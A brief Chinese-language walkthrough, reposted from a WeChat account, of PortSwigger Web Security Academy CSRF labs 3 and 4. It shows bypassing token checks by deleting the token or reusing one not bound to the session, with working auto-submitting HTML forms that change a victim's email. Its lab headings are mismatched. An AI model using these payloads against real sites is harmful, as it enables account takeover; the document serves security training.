(Lab 3)CSRF where token validation depends on token being present(删除token参数绕过)
(Lab 4) CSRF where token is not tied to user session(token不绑定用户,截断token绕过)
靶场地址:https://portswigger.net/web-security
实验3:CSRF where token validation depends on request method
1.登录后修改邮箱并删除token,生成csrf包
2.使用burpsuite生成的html包进行存储和向受害者发送
3.再使用靶场提供的包进行存储和向受害者发送,通过此关(每次发送需要变更邮箱)
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
实验4:CSRF where token validation depends on request method
1.登录后修改邮箱截断并获取token
2.使用如下POC进行存储和向受害者发送,通过此关(每次发送需要变更邮箱)
<form action="https://0a5900b5044fe6828020b7ef00c400f0.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1123@123.com" />
<input type="hidden" name="csrf" value="44F7daYcsTeVri26CVhxlmcrXYOrCN8C" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
原文始发于微信公众号(鲲哥的Bypass之旅):portswigger CSRF靶场-Lab3,4
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论